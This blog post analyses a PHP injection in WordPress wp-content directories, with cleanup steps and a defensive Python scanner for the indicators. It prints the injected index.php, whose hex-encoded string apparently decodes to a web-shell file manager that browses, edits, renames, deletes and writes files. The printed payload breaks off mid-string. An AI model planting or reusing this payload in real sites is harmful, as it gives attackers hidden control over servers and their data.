DEV Community

MD Pabel

Posted on • Originally published at mdpabel.com on

Malicious PHP Code Injection in WordPress Directories

## Technical Analysis

I discovered malware in multiple folders within the wp-content directory of a WordPress site. The affected directories include:

  • wp-content/themes/wk
  • wp-content/plugins/wk
  • wp-content/
  • wp-content/uploads
  • wp-content/mu-plugins

The malware also set the permissions of these directories to 555 (read and execute only), which blocks any modification or cleanup of their contents until the permissions are restored.

## Code Analysis

The injected code was found in a file named index.php. It wraps its payload in a class with a meaningless name and stores the body as a single pipe-delimited hex string (the capture below ends mid-string):

```php
<?php
class nigwqgqwtqwtqwt{
    public function nigwqgqwtqwtqwti(){
        $list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|474554
5B|2761|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|7269|65|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|7265|616368|20|282465|6E747269|65|73206173|2024656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729|2063|6F6E|7469|6E75653B|0A20|202020|20|2020|2020|20202024|70617468|203D|2024|64|202E20|444952|4543544F|52595F|53|455041|524154|4F5220|2E2024|656E74|72793B0A|2020|2020|2020|20|202020|2020|696620|28|69735F64|69|722824|706174|682929|207B|0A20|20|20|202020|202020|202020|20202020|246469|724C6973|745B|5D203D20|24656E|7472793B|0A|20202020|20202020|20202020|7D|20656C73|6520|7B0A2020|202020|20202020|20|20202020|2020|246669|6C654C69|73|74|5B|5D20|3D|20|24656E|747279|3B0A2020|20202020|20|20202020|207D0A|20202020|2020|20|20|7D0A2020|202020|20202066|6F|7265|616368|20|28246469|72|4C|69737420|61732024|656E7472|792920|7B|0A|20202020|20202020|202020|20247061|74|68203D|202464|202E2044|4952|4543544F|5259|5F53|4550|41|52|41|544F|52202E20|24656E74|72793B0A|202020|20202020|20202020|2065|63686F|20273C74|723E27|3B|0A20|20|2020|20|20|2020|20202020|6563686F|2027|3C|74|643E3C|612063|6C|61|73|733D22|616A61|7844|697222|20687265|663D223F|643D27|20|2E2068|6578|2824|706174|6829202E|2027|223E|27202E20|68746D6C|737065|636961|6C63|686172|732824|656E74|72792920|2E20273C|2F613E3C|2F
|7464|3E27|3B0A20|2020|20202020|20|2020|202065|63686F|20273C74|643E|2D|3C|2F74|64|3E273B|0A202020|202020|20202020|20|20656368|6F|20273C74|643E3C2F|74643E|273B0A20|20202020|2020|20|20202020|656368|6F|20273C2F|74723E27|3B0A20|202020|2020|20|207D0A|2020|2020|20|20202066|6F7|6561|6368|20|2824|66696C|65|4C697374|206173|202465|6E|7472|7929207B|0A202020|20|20|20202020|20|20|20247061|746820|3D2024|64202E20|4449|52454354|4F52595F|5345|5041|524154|4F|52|202E2024|656E74|72|793B0A|2020|2020|202020|20|202020|206563|686F20|273C7472|3E273B|0A202020|202020|20202020|2020|65|6368|6F20273C|74|643E|27202E20|68746D6C|737065|63|69616C63|68|61|7273|28|24|656E74|7279|29202E20|273C2F74|643E27|3B0A|20202020|2020|20|2020|202020|6563|686F2027|3C74643E|27|202E|202869|735F66|696C65|2824|70617468|2920|3F2066|696C65|7369|7A|65282470|617468|2920|2E|20272062|797465|732720|3A20272D|27|29|20|2E20273C|2F|74643E27|3B0A|20202020|202020|202020|20|20656368|6F|20273C|74643E27|3B|0A20|2020|20|2020|2020|2020|20|206563|686F2027|3C6120|636C|61|73733D22|616A61|7845|6469|74|2220|68726566|3D22|3F616374|69|6F6E3D65|646974|2664|3D27|202E20|68657828|24|642920|2E|20|2726|6669|6C653D|27|202E|207572|6C656E63|6F|64|65|2824656E|74|72792920|2E20|27|223E45|646974|3C2F613E|207C2027|3B0A|202020|20|202020|20|20202020|20|20206563|686F20|273C|612063|6C|61|73733D22|616A61|78|5265|6E616D|652220|68726566|3D223F61|6374696F|6E3D72|65|6E616D|65|26643D27|20|2E|20|68|657828|24642920|2E202726|66|696C653D|27|202E20|75726C656E|636F|64|6528|24|656E|74|7279|29202E|2027|223E5265|6E616D|653C|2F613E|20|7C|20273B|0A2020|20|20|2020|202020|20|2020|6563686F|2027|3C612063|6C617373|3D|22616A|61784465|6C657465|2220|6872|65663D22|3F616374|696F6E3D|64|656C|65|7465|26643D27|20|2E20|68657828|24|642920|2E|20|2726|66|696C653D|27|202E2075|726C656E|636F|64|652824|65|6E747279|2920|2E202722|3E|44|656C|65|74|653C|2F613E|273B|0A20|20202020|20|20|202020|2020|65636F|20273C2F|74723E27|3B0A2020|20202020|20207D0A|20|2020|2020|2020|2020|203F3E|0A|20202020|20202020|3C2F
|74|626F6479|3E0A|20|20|20203C|2F74|61|626C|65|3E|0A2020|20203C|3F7068|700A2020|20|20657869|743B0A7D|0A|0A|69662028|69|73|73657428|245F504F|5354|5B2762|656E6B|79|6F27|5D292026|2620|69737365|742824|5F|504F53|545B27|6461|6B|656A61|275D29|29207B0A|202020|2024|66696C65|4E|616D6520|3D|20245F|504F|53|545B2762|65|6E6B|796F|275D3B0A|20202020|24656E|63|6F64|65|64436F6E|74|656E74|203D20|24|5F|504F53|545B2764|616B|656A61|275D3B|0A202020|20246465|636F6465|64436F6E|74656E|7420|3D20|68657832|62696E|2824656E|636F|646564|436F6E|74|656E7429|3B0A0A20|2020|20696620|282464|65636F64|65|64436F|6E|7465|6E74|20|3D3D|3D2066|616C7365|2920|7B0A20|20|20202020|20206966|202824|697341|6A617829|20|7B0A|20202020|20|2020|20202020|20|68656164|6572|28|27436F6E|74|656E74|2D54|7970653A|20|6170706C|696361|74|69|6F|6E2F|6A736F|6E27|293B0A|20|20202020|20|2020|202020|206563|686F|20|6A73|6F6E5F|65|6E|636F64|65285B27|737461|747573|27|203D3E|202766|6169|6C6564|272C2027|6D7367|27203D3E|2027496E|76616C69|64|20426173|653634|20656E|636F64|696E|67|275D|293B|0A20|20|20202020|20|207D|2065|6C|7365207B|0A2020|20|20202020|2020|20|202073|657446|6C61|7368|28|27666169|6C|656427|2C2027|496E76|616C|69642042|6173|65|3634|20656E63|6F|64|696E|67|2729|3B|0A|2020|20|2020|20|2020|
```

> **VirusTotal Analysis:** 🛡️ **Zero-Day / Fully Undetected.**


## Removal Protocol

1. Remove all malicious files from the following directories: wp-content/themes/wk, wp-content/plugins/wk, wp-content/uploads, wp-content/mu-plugins.
2. Change the permissions of the affected directories back to 755.
3. Use a file integrity plugin to verify the WordPress installation and identify any other compromised files.
4. Update all WordPress plugins, themes, and core files to the latest versions.
5. Implement appropriate security measures, such as a firewall and malware scanner, to prevent future infections.
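
A scanner for the two indicators described in this post, the pipe-delimited hex payload hidden in index.php and directories locked down to 555, which can be run over wp-content before and after the removal steps. This is an added example, not the author's tooling; the eight-chunk threshold, the PHP marker list and the constructed fixture are assumptions.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Pipe-delimited hex run of the kind seen in the injected index.php ("73657373|696F|6E5F73|...").
# Requiring at least eight chunks is an assumption chosen to skip short legitimate strings.
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2,8}\|){8,}[0-9A-Fa-f]{2,8}")
PHP_MARKERS = ("session_start", "$_POST", "$_GET", "eval(", "scandir(")  # assumed marker set

def hex_run_decodes_to_php(run: str) -> bool:
    """Join the chunks, hex-decode them and look for PHP tokens a plain data string should not hide."""
    try:
        text = bytes.fromhex(run.replace("|", "")).decode("latin-1")
    except ValueError:  # odd length or a non-hex chunk: not a clean payload
        return False
    return any(marker in text for marker in PHP_MARKERS)

def scan_wp_content(root) -> dict:
    """Walk wp-content and report PHP files carrying a hex payload plus directories set to 555."""
    root = Path(root)
    hits, ro_dirs = [], []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.is_dir():
            if stat.S_IMODE(path.stat().st_mode) == 0o555:
                ro_dirs.append(rel)
        elif path.suffix.lower() == ".php":
            data = path.read_text(errors="ignore")
            if any(hex_run_decodes_to_php(m.group(0)) for m in HEX_RUN.finditer(data)):
                hits.append(rel)
    return {"hex_payload": hits, "ro_dirs": ro_dirs}

def build_demo_tree() -> str:
    """Constructed fixture: a fake wp-content with one clean plugin and one infected theme dir."""
    root = Path(tempfile.mkdtemp(prefix="wp-content-"))
    (root / "plugins" / "hello").mkdir(parents=True)
    (root / "plugins" / "hello" / "hello.php").write_text("<?php echo 'Hello, Dolly';")
    # Constructed payload encoded the way the sample is: hex split into pipe-delimited chunks.
    hexstr = b"session_start(); $d = $_POST['d'];".hex()
    encoded = "|".join(hexstr[i:i + 4] for i in range(0, len(hexstr), 4))
    wk = root / "themes" / "wk"
    wk.mkdir(parents=True)
    (wk / "index.php").write_text(f'<?php\nclass x{{ function y(){{ $list = "{encoded}"; }} }}')
    os.chmod(wk, 0o555)  # mirrors the 555 lock-down observed on the infected directories
    return str(root)

if __name__ == "__main__":
    for kind, paths in scan_wp_content(build_demo_tree()).items():
        print(kind, paths)
```

Point it at the real wp-content path instead of the fixture, and treat any hit as a file to quarantine and compare against a known-good copy rather than delete blindly.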

> **Status:** Active Threat.  
> **Verification:** Verified by MD Pabel.